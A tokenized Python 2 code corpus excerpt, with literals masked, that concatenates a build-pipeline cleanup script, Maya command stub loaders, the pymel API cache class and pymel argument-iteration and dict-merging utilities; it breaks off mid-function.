rmtree ( ) <EOL> print "<STR_LIT>" % _pNetworkLoc <EOL> unNeededRoot = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> for unNeeded in unNeededRoot : <EOL> for _file in _pNetworkLoc . files ( ) : <EOL> if _file . basename ( ) == unNeeded : <EOL> _file . makeWritable ( ) <EOL> print "<STR_LIT>" % _file <EOL> _file . remove ( ) <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> logger . info ( "<STR_LIT>" ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> return result <EOL> def removePYfiles ( self , pathToScrape = '<STR_LIT>' , optionalExt = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> completeSuccess = True <EOL> logger . info ( "<STR_LIT>" % ( optionalExt , pathToScrape ) ) <EOL> if not pathToScrape : <EOL> pathToScrape = self . networkLoc <EOL> count = <NUM_LIT:0> <EOL> for pyFile in Path ( pathToScrape ) . walkfiles ( '<STR_LIT>' % optionalExt ) : <EOL> if "<STR_LIT>" in pyFile or "<STR_LIT>" in pyFile or "<STR_LIT>" in pyFile : <EOL> pyFile . makeWritable ( ) <EOL> continue <EOL> if not "<STR_LIT>" in pyFile : <EOL> if not "<STR_LIT>" in pyFile and not "<STR_LIT>" in pyFile : <EOL> try : <EOL> if Path ( pyFile ) . isReadOnly : <EOL> Path ( pyFile ) . makeWritable ( ) <EOL> os . remove ( pyFile ) <EOL> logger . debug ( "<STR_LIT>" % pyFile ) <EOL> count += <NUM_LIT:1> <EOL> except : <EOL> logger . info ( "<STR_LIT>" % pyFile ) <EOL> completeSuccess = False <EOL> print "<STR_LIT>" % ( count , optionalExt , pathToScrape ) <EOL> logger . info ( "<STR_LIT>" % ( count , optionalExt , pathToScrape ) ) <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" % optionalExt <EOL> print "<STR_LIT>" <EOL> logger . info ( "<STR_LIT>" ) <EOL> logger . info ( "<STR_LIT>" % optionalExt ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> return completeSuccess <EOL> def swapGVarInit ( self , direction = '<STR_LIT>' ) : <EOL> gVarFile = '<STR_LIT>' % self . pipelineSourceLocation <EOL> self . p4 . 
fileName = gVarFile <EOL> self . p4 . p4CheckOut ( desc = "<STR_LIT>" ) <EOL> try : <EOL> f = open ( gVarFile , "<STR_LIT:r>" ) <EOL> gVarContent = f . readlines ( ) <EOL> f . close ( ) <EOL> newLines = [ ] <EOL> for line in gVarContent : <EOL> if "<STR_LIT>" in line : <EOL> if '<STR_LIT>' % direction in line : <EOL> newLines . append ( line . replace ( '<STR_LIT>' , '<STR_LIT:r>' ) ) <EOL> else : <EOL> newLines . append ( '<STR_LIT>' % line ) <EOL> else : <EOL> newLines . append ( line ) <EOL> f = open ( gVarFile , "<STR_LIT:w>" ) <EOL> f . writelines ( newLines ) <EOL> f . close ( ) <EOL> except : <EOL> logger . info ( "<STR_LIT>" % gVarFile ) <EOL> print "<STR_LIT>" % gVarFile <EOL> self . p4 . p4RevertFile ( ) <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> logger . info ( "<STR_LIT>" ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> def run ( ) : <EOL> PipelineBuild ( remoteBuild = True ) . buildPCSPipeline ( compileInstaller = False , pyc = True , removePY = True , removePYC = True ) <EOL> run ( ) <EOL> if not __name__ == "<STR_LIT:__main__>" : <EOL> print "<STR_LIT>" </s>
<s> """<STR_LIT>""" <EOL> import constraints <EOL> import customNodes <EOL> import expressions <EOL> def reloadAll ( ) : <EOL> """<STR_LIT>""" <EOL> reload ( constraints ) <EOL> reload ( customNodes ) <EOL> reload ( expressions ) <EOL> def exportRigs ( ) : <EOL> """<STR_LIT>""" <EOL> customNodes . exportNodes ( ) <EOL> constraints . exportConstraints ( ) <EOL> expressions . exportExpressions ( ) </s>
<s> import maya . cmds <EOL> import sys , os . path <EOL> commandListLocations = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> def __makeStubFunc ( command , library ) : <EOL> def stubFunc ( * args , ** keywords ) : <EOL> """<STR_LIT>""" <EOL> maya . cmds . dynamicLoad ( library ) <EOL> return maya . cmds . __dict__ [ command ] ( * args , ** keywords ) <EOL> return stubFunc <EOL> def processCommandList ( ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> commandListPath = os . path . realpath ( os . environ [ '<STR_LIT>' ] ) <EOL> platform = maya . cmds . about ( os = True ) <EOL> commandListPath = os . path . join ( commandListPath , commandListLocations [ platform ] , '<STR_LIT>' ) <EOL> file = open ( commandListPath , '<STR_LIT:r>' ) <EOL> for line in file : <EOL> commandName , library = line . split ( ) <EOL> if not commandName in maya . cmds . __dict__ : <EOL> maya . cmds . __dict__ [ commandName ] = __makeStubFunc ( commandName , library ) <EOL> except : <EOL> sys . stderr . write ( "<STR_LIT>" % commandListPath ) <EOL> raise </s>
<s> """<STR_LIT>""" <EOL> import sys , inspect , time , os . path <EOL> import pymel . api as api <EOL> import pymel . versions as versions <EOL> from pymel . util import expandArgs <EOL> import pymel . util as _util <EOL> import startup <EOL> import plogging as _plogging <EOL> _logger = _plogging . getLogger ( __name__ ) <EOL> class ApiEnum ( tuple ) : <EOL> def __str__ ( self ) : return '<STR_LIT:.>' . join ( [ str ( x ) for x in self ] ) <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , super ( ApiEnum , self ) . __repr__ ( ) ) <EOL> def pymelName ( self ) : <EOL> import pymel . internal . factories as factories <EOL> parts = list ( self ) <EOL> pymelName = factories . apiClassNameToPymelClassName ( self [ <NUM_LIT:0> ] ) <EOL> if pymelName is not None : <EOL> parts [ <NUM_LIT:0> ] = pymelName <EOL> return '<STR_LIT:.>' . join ( [ str ( x ) for x in parts ] ) <EOL> if versions . current ( ) < versions . v2012 : <EOL> api . Enum = ApiEnum <EOL> Enum = ApiEnum <EOL> def _makeDgModGhostObject ( mayaType , dagMod , dgMod ) : <EOL> if type ( dagMod ) is not api . MDagModifier or type ( dgMod ) is not api . MDGModifier : <EOL> raise ValueError , "<STR_LIT>" <EOL> parent = dagMod . createNode ( '<STR_LIT>' , api . MObject ( ) ) <EOL> try : <EOL> obj = dgMod . createNode ( mayaType ) <EOL> except RuntimeError : <EOL> try : <EOL> obj = dagMod . createNode ( mayaType , parent ) <EOL> except Exception , err : <EOL> _logger . debug ( "<STR_LIT>" % ( mayaType , err ) ) <EOL> return None <EOL> if api . isValidMObject ( obj ) : <EOL> return obj <EOL> else : <EOL> _logger . debug ( "<STR_LIT>" % mayaType ) <EOL> return None <EOL> def _defaultdictdict ( cls , val = None ) : <EOL> if val is None : <EOL> return _util . defaultdict ( dict ) <EOL> else : <EOL> return _util . defaultdict ( dict , val ) <EOL> class ApiMelBridgeCache ( startup . 
SubItemCache ) : <EOL> NAME = '<STR_LIT>' <EOL> DESC = '<STR_LIT>' <EOL> COMPRESSED = True <EOL> USE_VERSION = False <EOL> _CACHE_NAMES = '''<STR_LIT>''' . split ( ) <EOL> CACHE_TYPES = { '<STR_LIT>' : _defaultdictdict } <EOL> STORAGE_TYPES = { '<STR_LIT>' : dict } <EOL> class ApiCache ( startup . SubItemCache ) : <EOL> NAME = '<STR_LIT>' <EOL> DESC = '<STR_LIT>' <EOL> COMPRESSED = True <EOL> USE_VERSION = True <EOL> _CACHE_NAMES = '''<STR_LIT>''' . split ( ) <EOL> EXTRA_GLOBAL_NAMES = tuple ( '''<STR_LIT>''' . split ( ) ) <EOL> RESERVED_TYPES = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:object>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : 
'<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> def __init__ ( self ) : <EOL> super ( ApiCache , self ) . __init__ ( ) <EOL> for name in self . EXTRA_GLOBAL_NAMES : <EOL> setattr ( self , name , { } ) <EOL> def _buildMayaToApiInfo ( self , mayaTypes ) : <EOL> dagMod = api . MDagModifier ( ) <EOL> dgMod = api . MDGModifier ( ) <EOL> _logger . debug ( "<STR_LIT>" ) <EOL> unknownTypes = set ( ) <EOL> for mayaType in mayaTypes : <EOL> apiType = None <EOL> if self . reservedMayaTypes . has_key ( mayaType ) : <EOL> apiType = self . reservedMayaTypes [ mayaType ] <EOL> else : <EOL> obj = _makeDgModGhostObject ( mayaType , dagMod , dgMod ) <EOL> if obj : <EOL> apiType = obj . apiTypeStr ( ) <EOL> else : <EOL> unknownTypes . add ( mayaType ) <EOL> if apiType is not None : <EOL> self . mayaTypesToApiTypes [ mayaType ] = apiType <EOL> _logger . debug ( "<STR_LIT>" ) <EOL> if len ( unknownTypes ) > <NUM_LIT:0> : <EOL> _logger . warn ( "<STR_LIT>" % "<STR_LIT:U+002CU+0020>" . join ( unknownTypes ) ) <EOL> for mayaType , apiType in self . mayaTypesToApiTypes . iteritems ( ) : <EOL> self . addMayaType ( mayaType , apiType ) <EOL> def _buildApiTypesList ( self ) : <EOL> """<STR_LIT>""" <EOL> self . apiTypesToApiEnums = dict ( inspect . getmembers ( api . MFn , lambda x : type ( x ) is int ) ) <EOL> self . apiEnumsToApiTypes = dict ( ( self . apiTypesToApiEnums [ k ] , k ) for k in self . apiTypesToApiEnums . 
keys ( ) ) <EOL> def _buildMayaReservedTypes ( self , force = False ) : <EOL> """<STR_LIT>""" <EOL> if not force and ( getattr ( self , '<STR_LIT>' , None ) <EOL> and getattr ( self , '<STR_LIT>' , None ) ) : <EOL> return <EOL> invalidReservedTypes = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> self . reservedMayaTypes = dict ( ( item [ <NUM_LIT:0> ] , item [ <NUM_LIT:1> ] ) for item in filter ( lambda i : i [ <NUM_LIT:1> ] in self . apiTypesToApiEnums , self . RESERVED_TYPES . iteritems ( ) ) ) <EOL> self . reservedMayaTypes . update ( invalidReservedTypes ) <EOL> self . reservedApiTypes = dict ( ( item [ <NUM_LIT:1> ] , item [ <NUM_LIT:0> ] ) for item in self . reservedMayaTypes . iteritems ( ) ) <EOL> def _buildApiClassInfo ( self ) : <EOL> _logger . debug ( "<STR_LIT>" ) <EOL> from pymel . internal . parsers import ApiDocParser <EOL> self . apiClassInfo = { } <EOL> parser = ApiDocParser ( api , enumClass = ApiEnum ) <EOL> for name , obj in inspect . getmembers ( api , lambda x : type ( x ) == type and x . __name__ . startswith ( '<STR_LIT:M>' ) ) : <EOL> if not name . startswith ( '<STR_LIT>' ) : <EOL> try : <EOL> info = parser . parse ( name ) <EOL> self . apiClassInfo [ name ] = info <EOL> except ( IOError , ValueError , IndexError ) , e : <EOL> _logger . warn ( "<STR_LIT>" % ( name , e ) ) <EOL> _logger . debug ( "<STR_LIT>" ) <EOL> def _buildApiRelationships ( self ) : <EOL> """<STR_LIT>""" <EOL> _logger . debug ( "<STR_LIT>" ) <EOL> def _MFnType ( x ) : <EOL> if x == api . MFnBase : <EOL> return self . apiEnumsToApiTypes [ <NUM_LIT:1> ] <EOL> else : <EOL> try : <EOL> return self . apiEnumsToApiTypes [ x ( ) . type ( ) ] <EOL> except : <EOL> return self . apiEnumsToApiTypes [ <NUM_LIT:0> ] <EOL> if not startup . mayaStartupHasRun ( ) : <EOL> startup . mayaInit ( ) <EOL> import maya . cmds <EOL> import pymel . api . plugins as plugins <EOL> import maya . mel <EOL> maya . mel . eval ( '<STR_LIT>' ) <EOL> plugins . 
loadAllMayaPlugins ( ) <EOL> mfnClasses = inspect . getmembers ( api , lambda x : inspect . isclass ( x ) and issubclass ( x , api . MFnBase ) ) <EOL> for name , mfnClass in mfnClasses : <EOL> current = _MFnType ( mfnClass ) <EOL> if not current : <EOL> _logger . warning ( "<STR_LIT>" % current ) <EOL> elif current == '<STR_LIT>' : <EOL> _logger . warning ( "<STR_LIT>" % current ) <EOL> else : <EOL> self . apiTypesToApiClasses [ current ] = mfnClass <EOL> self . _buildApiClassInfo ( ) <EOL> allMayaTypes = self . reservedMayaTypes . keys ( ) + maya . cmds . ls ( nodeTypes = True ) <EOL> self . _buildMayaToApiInfo ( allMayaTypes ) <EOL> _logger . debug ( "<STR_LIT>" ) <EOL> def addMayaType ( self , mayaType , apiType = None , updateObj = None ) : <EOL> """<STR_LIT>""" <EOL> if apiType is not '<STR_LIT>' : <EOL> apiEnum = getattr ( api . MFn , apiType ) <EOL> self . mayaTypesToApiTypes [ mayaType ] = apiType <EOL> self . mayaTypesToApiEnums [ mayaType ] = apiEnum <EOL> def removeMayaType ( self , mayaType , updateObj = None ) : <EOL> """<STR_LIT>""" <EOL> self . mayaTypesToApiEnums . pop ( mayaType , None ) <EOL> self . mayaTypesToApiTypes . pop ( mayaType , None ) <EOL> def build ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( ApiCache , self ) . build ( ) <EOL> self . _buildMayaReservedTypes ( force = False ) <EOL> def read ( self , raw = False ) : <EOL> data = super ( ApiCache , self ) . read ( ) <EOL> if not raw : <EOL> if data is not None and len ( data ) != len ( self . _CACHE_NAMES ) : <EOL> if len ( data ) == <NUM_LIT:8> and versions . current ( ) < versions . v2012 : <EOL> data = data [ <NUM_LIT:2> : <NUM_LIT:6> ] + data [ <NUM_LIT:7> : ] <EOL> else : <EOL> data = None <EOL> return data <EOL> def rebuild ( self ) : <EOL> """<STR_LIT>""" <EOL> _logger . info ( "<STR_LIT>" ) <EOL> self . _buildApiTypesList ( ) <EOL> self . _buildMayaReservedTypes ( force = True ) <EOL> self . _buildApiRelationships ( ) <EOL> _logger . info ( '<STR_LIT>' ) <EOL> self . 
_mergeClassOverrides ( ) <EOL> def _mergeClassOverrides ( self , bridgeCache = None ) : <EOL> if bridgeCache is None : <EOL> bridgeCache = ApiMelBridgeCache ( ) <EOL> bridgeCache . build ( ) <EOL> _util . mergeCascadingDicts ( bridgeCache . apiClassOverrides , self . apiClassInfo , allowDictToListMerging = True ) <EOL> def melBridgeContents ( self ) : <EOL> return self . _mayaApiMelBridge . contents ( ) <EOL> def extraDicts ( self ) : <EOL> return tuple ( getattr ( self , x ) for x in self . EXTRA_GLOBAL_NAMES ) </s>
<s> """<STR_LIT>""" <EOL> from collections import deque as _deque <EOL> import sys , operator , itertools <EOL> from utilitytypes import ProxyUnicode <EOL> def isIterable ( obj ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( obj , basestring ) : return False <EOL> elif isinstance ( obj , ProxyUnicode ) : return False <EOL> try : <EOL> iter ( obj ) <EOL> except TypeError : return False <EOL> else : return True <EOL> def isScalar ( obj ) : <EOL> """<STR_LIT>""" <EOL> return operator . isNumberType ( obj ) and not isinstance ( obj , complex ) <EOL> def isNumeric ( obj ) : <EOL> """<STR_LIT>""" <EOL> return operator . isNumberType ( obj ) <EOL> def isSequence ( obj ) : <EOL> """<STR_LIT>""" <EOL> return operator . isSequenceType ( obj ) <EOL> def isMapping ( obj ) : <EOL> """<STR_LIT>""" <EOL> return operator . isMappingType ( obj ) <EOL> clsname = lambda x : type ( x ) . __name__ <EOL> def convertListArgs ( args ) : <EOL> if len ( args ) == <NUM_LIT:1> and isIterable ( args [ <NUM_LIT:0> ] ) : <EOL> return tuple ( args [ <NUM_LIT:0> ] ) <EOL> return args <EOL> def expandArgs ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> tpe = kwargs . get ( '<STR_LIT:type>' , '<STR_LIT:all>' ) <EOL> limit = kwargs . get ( '<STR_LIT>' , sys . getrecursionlimit ( ) ) <EOL> postorder = kwargs . get ( '<STR_LIT>' , False ) <EOL> breadth = kwargs . get ( '<STR_LIT>' , False ) <EOL> if tpe == '<STR_LIT:list>' or tpe == list : <EOL> def _expandArgsTest ( arg ) : return type ( arg ) == list <EOL> elif tpe == '<STR_LIT:all>' : <EOL> def _expandArgsTest ( arg ) : return isIterable ( arg ) <EOL> else : <EOL> raise ValueError , "<STR_LIT>" % str ( tpe ) <EOL> if postorder : <EOL> return postorderArgs ( limit , _expandArgsTest , * args ) <EOL> elif breadth : <EOL> return breadthArgs ( limit , _expandArgsTest , * args ) <EOL> else : <EOL> return preorderArgs ( limit , _expandArgsTest , * args ) <EOL> def preorderArgs ( limit = sys . 
getrecursionlimit ( ) , testFn = isIterable , * args ) : <EOL> """<STR_LIT>""" <EOL> stack = [ ( x , <NUM_LIT:0> ) for x in args ] <EOL> result = _deque ( ) <EOL> while stack : <EOL> arg , level = stack . pop ( ) <EOL> if testFn ( arg ) and level < limit : <EOL> stack += [ ( x , level + <NUM_LIT:1> ) for x in arg ] <EOL> else : <EOL> result . appendleft ( arg ) <EOL> return tuple ( result ) <EOL> def postorderArgs ( limit = sys . getrecursionlimit ( ) , testFn = isIterable , * args ) : <EOL> """<STR_LIT>""" <EOL> if len ( args ) == <NUM_LIT:1> : <EOL> return ( args [ <NUM_LIT:0> ] , ) <EOL> else : <EOL> deq = _deque ( ( x , <NUM_LIT:0> ) for x in args ) <EOL> stack = [ ] <EOL> result = [ ] <EOL> while deq : <EOL> arg , level = deq . popleft ( ) <EOL> if testFn ( arg ) and level < limit : <EOL> deq = _deque ( [ ( x , level + <NUM_LIT:1> ) for x in arg ] + list ( deq ) ) <EOL> else : <EOL> if stack : <EOL> while stack and level <= stack [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] : <EOL> result . append ( stack . pop ( ) [ <NUM_LIT:0> ] ) <EOL> stack . append ( ( arg , level ) ) <EOL> else : <EOL> stack . append ( ( arg , level ) ) <EOL> while stack : <EOL> result . append ( stack . pop ( ) [ <NUM_LIT:0> ] ) <EOL> return tuple ( result ) <EOL> def breadthArgs ( limit = sys . getrecursionlimit ( ) , testFn = isIterable , * args ) : <EOL> """<STR_LIT>""" <EOL> deq = _deque ( ( x , <NUM_LIT:0> ) for x in args ) <EOL> result = [ ] <EOL> while deq : <EOL> arg , level = deq . popleft ( ) <EOL> if testFn ( arg ) and level < limit : <EOL> for a in arg : <EOL> deq . append ( ( a , level + <NUM_LIT:1> ) ) <EOL> else : <EOL> result . append ( arg ) <EOL> return tuple ( result ) <EOL> def iterateArgs ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> tpe = kwargs . get ( '<STR_LIT:type>' , '<STR_LIT:all>' ) <EOL> limit = kwargs . get ( '<STR_LIT>' , sys . getrecursionlimit ( ) ) <EOL> postorder = kwargs . get ( '<STR_LIT>' , False ) <EOL> breadth = kwargs . 
get ( '<STR_LIT>' , False ) <EOL> if tpe == '<STR_LIT:list>' or tpe == list : <EOL> def _iterateArgsTest ( arg ) : return type ( arg ) == list <EOL> elif tpe == '<STR_LIT:all>' : <EOL> def _iterateArgsTest ( arg ) : return isIterable ( arg ) <EOL> else : <EOL> raise ValueError , "<STR_LIT>" % str ( tpe ) <EOL> if postorder : <EOL> for arg in postorderIterArgs ( limit , _iterateArgsTest , * args ) : <EOL> yield arg <EOL> elif breadth : <EOL> for arg in breadthIterArgs ( limit , _iterateArgsTest , * args ) : <EOL> yield arg <EOL> else : <EOL> for arg in preorderIterArgs ( limit , _iterateArgsTest , * args ) : <EOL> yield arg <EOL> def preorderIterArgs ( limit = sys . getrecursionlimit ( ) , testFn = isIterable , * args ) : <EOL> """<STR_LIT>""" <EOL> if limit : <EOL> for arg in args : <EOL> if testFn ( arg ) : <EOL> for a in preorderIterArgs ( limit - <NUM_LIT:1> , testFn , * arg ) : <EOL> yield a <EOL> else : <EOL> yield arg <EOL> else : <EOL> for arg in args : <EOL> yield arg <EOL> def postorderIterArgs ( limit = sys . getrecursionlimit ( ) , testFn = isIterable , * args ) : <EOL> """<STR_LIT>""" <EOL> if limit : <EOL> last = None <EOL> for arg in args : <EOL> if testFn ( arg ) : <EOL> for a in postorderIterArgs ( limit - <NUM_LIT:1> , testFn , * arg ) : <EOL> yield a <EOL> else : <EOL> if last : <EOL> yield last <EOL> last = arg <EOL> if last : <EOL> yield last <EOL> else : <EOL> for arg in args : <EOL> yield arg <EOL> def breadthIterArgs ( limit = sys . getrecursionlimit ( ) , testFn = isIterable , * args ) : <EOL> """<STR_LIT>""" <EOL> deq = _deque ( ( x , <NUM_LIT:0> ) for x in args ) <EOL> while deq : <EOL> arg , level = deq . popleft ( ) <EOL> if testFn ( arg ) and level < limit : <EOL> for a in arg : <EOL> deq . append ( ( a , level + <NUM_LIT:1> ) ) <EOL> else : <EOL> yield arg <EOL> def preorder ( iterable , testFn = isIterable , limit = sys . 
getrecursionlimit ( ) ) : <EOL> """<STR_LIT>""" <EOL> if limit : <EOL> for arg in iterable : <EOL> if testFn ( arg ) : <EOL> for a in preorderIterArgs ( limit - <NUM_LIT:1> , testFn , * arg ) : <EOL> yield a <EOL> else : <EOL> yield arg <EOL> else : <EOL> for arg in iterable : <EOL> yield arg <EOL> def postorder ( iterable , testFn = isIterable , limit = sys . getrecursionlimit ( ) ) : <EOL> """<STR_LIT>""" <EOL> if limit : <EOL> last = None <EOL> for arg in iterable : <EOL> if testFn ( arg ) : <EOL> for a in postorderIterArgs ( limit - <NUM_LIT:1> , testFn , * arg ) : <EOL> yield a <EOL> else : <EOL> if last : <EOL> yield last <EOL> last = arg <EOL> if last : <EOL> yield last <EOL> else : <EOL> for arg in iterable : <EOL> yield arg <EOL> def breadth ( iterable , testFn = isIterable , limit = sys . getrecursionlimit ( ) ) : <EOL> """<STR_LIT>""" <EOL> deq = _deque ( ( x , <NUM_LIT:0> ) for x in iterable ) <EOL> while deq : <EOL> arg , level = deq . popleft ( ) <EOL> if testFn ( arg ) and level < limit : <EOL> for a in arg : <EOL> deq . append ( ( a , level + <NUM_LIT:1> ) ) <EOL> else : <EOL> yield arg <EOL> def listForNone ( res ) : <EOL> "<STR_LIT>" <EOL> if res is None : <EOL> return [ ] <EOL> return res <EOL> def pairIter ( sequence ) : <EOL> '''<STR_LIT>''' <EOL> theIter = iter ( sequence ) <EOL> return itertools . izip ( theIter , theIter ) <EOL> def reorder ( x , indexList = [ ] , indexDict = { } ) : <EOL> """<STR_LIT>""" <EOL> x = list ( x ) <EOL> num = len ( x ) <EOL> popCount = <NUM_LIT:0> <EOL> indexValDict = { } <EOL> for i , index in enumerate ( indexList ) : <EOL> if index is not None : <EOL> val = x . pop ( index - popCount ) <EOL> assert index not in indexDict , indexDict <EOL> indexValDict [ i ] = val <EOL> popCount += <NUM_LIT:1> <EOL> for k , v in indexDict . items ( ) : <EOL> indexValDict [ v ] = x . 
pop ( k - popCount ) <EOL> popCount += <NUM_LIT:1> <EOL> newlist = [ ] <EOL> for i in range ( num ) : <EOL> try : <EOL> val = indexValDict [ i ] <EOL> except KeyError : <EOL> val = x . pop ( <NUM_LIT:0> ) <EOL> newlist . append ( val ) <EOL> return newlist <EOL> class RemovedKey ( object ) : <EOL> def __init__ ( self , oldVal ) : <EOL> self . oldVal = oldVal <EOL> def __eq__ ( self , other ) : <EOL> return self . oldVal == other . oldVal <EOL> def __ne__ ( self , other ) : <EOL> return self . oldVal != other . oldVal <EOL> def compareCascadingDicts ( dict1 , dict2 ) : <EOL> '''<STR_LIT>''' <EOL> if isinstance ( dict1 , ( list , tuple ) ) : <EOL> dict1 = dict ( enumerate ( dict1 ) ) <EOL> if isinstance ( dict2 , ( list , tuple ) ) : <EOL> dict2 = dict ( enumerate ( dict2 ) ) <EOL> v1 = set ( dict1 ) <EOL> v2 = set ( dict2 ) <EOL> both = v1 & v2 <EOL> only1 = v1 - both <EOL> only2 = v2 - both <EOL> recurseTypes = ( dict , list , tuple ) <EOL> differences = dict ( ( key , dict2 [ key ] ) for key in only2 ) <EOL> differences . update ( ( key , RemovedKey ( dict1 [ key ] ) ) for key in only1 ) <EOL> for key in both : <EOL> val1 = dict1 [ key ] <EOL> val2 = dict2 [ key ] <EOL> if val1 != val2 : <EOL> if isinstance ( val1 , recurseTypes ) and isinstance ( val2 , recurseTypes ) : <EOL> subDiffs = compareCascadingDicts ( val1 , val2 ) [ - <NUM_LIT:1> ] <EOL> differences [ key ] = subDiffs <EOL> else : <EOL> differences [ key ] = val2 <EOL> return both , only1 , only2 , differences <EOL> def mergeCascadingDicts ( from_dict , to_dict , allowDictToListMerging = False , <EOL> allowNewListMembers = False ) : <EOL> """<STR_LIT>""" <EOL> listMerge = allowDictToListMerging and isinstance ( to_dict , list ) <EOL> if listMerge : <EOL> contains = lambda key : isinstance ( key , int ) and <NUM_LIT:0> <= key < len ( to_dict ) <EOL> else : <EOL> contains = lambda key : key in to_dict <EOL> for key , from_val in from_dict . 
iteritems ( ) : <EOL> if contains ( key ) : <EOL> if isinstance ( from_val , RemovedKey ) : <EOL> del to_dict [ key ] <EOL> continue <EOL> to_val = to_dict [ key ] <EOL> if hasattr ( from_val , '<STR_LIT>' ) and ( hasattr ( to_val , '<STR_LIT>' ) <EOL> or ( allowDictToListMerging and isinstance ( to_val , list ) ) ) : <EOL> mergeCascadingDicts ( from_val , to_val , allowDictToListMerging ) <EOL> else : <EOL> to_dict [ key ] = from_val <EOL> else : <EOL> if isinstance ( from_val , RemovedKey ) : <EOL> continue <EOL> if listMerge and allowNewListMembers and key >= len ( to_dict ) : <EOL> to_dict . extend ( ( None , ) * ( key + <NUM_LIT:1> - len ( to_dict ) ) ) <EOL> to_dict [ key ] = from_val <EOL> def setCascadingDictItem ( dict , keys , value ) : <EOL> currentDict = dict <EOL> for key in keys [ : - <NUM_LIT:1> ] : <EOL> if key not in currentDict : <EOL> currentDict [ key ] = { } <EOL> currentDict = currentDict [ key ] <EOL> currentDict [ keys [ - <NUM_LIT:1> ] ] = value <EOL> def getCascadingDictItem ( dict , keys , default = { } ) : <EOL> currentDict = dict <EOL> for key in keys [ : - <NUM_LIT:1> ] : <EOL> if isMapping ( currentDict ) and key not in currentDict : <EOL> currentDict [ key ] = { } <EOL> currentDict = currentDict [ key ] <EOL> try : <EOL> return currentDict [ keys [ - <NUM_LIT:1> ] ] <EOL> except KeyError : <EOL> return default <EOL> def sequenceToSlices ( intList , sort = True ) : <EOL> """<STR_LIT>""" <EOL> slices = [ ] <EOL> if intList : <EOL> if sort : <EOL> intList = sorted ( intList ) <EOL> start = intList [ <NUM_LIT:0> ] <EOL> stop = None <EOL> step = None <EOL> lastStep = None <EOL> lastVal = start <EOL> for curr in intList [ <NUM_LIT:1> : ] : <EOL> curr = int ( curr ) <EOL> thisStep = curr - lastVal <EOL> if lastStep is None : <EOL> pass <EOL> elif thisStep > <NUM_LIT:0> and thisStep == lastStep : <EOL> step = thisStep <EOL> else : <EOL> if step is not None : <EOL> if step == <NUM_LIT:1> : <EOL> newslice = slice ( start , lastVal + 
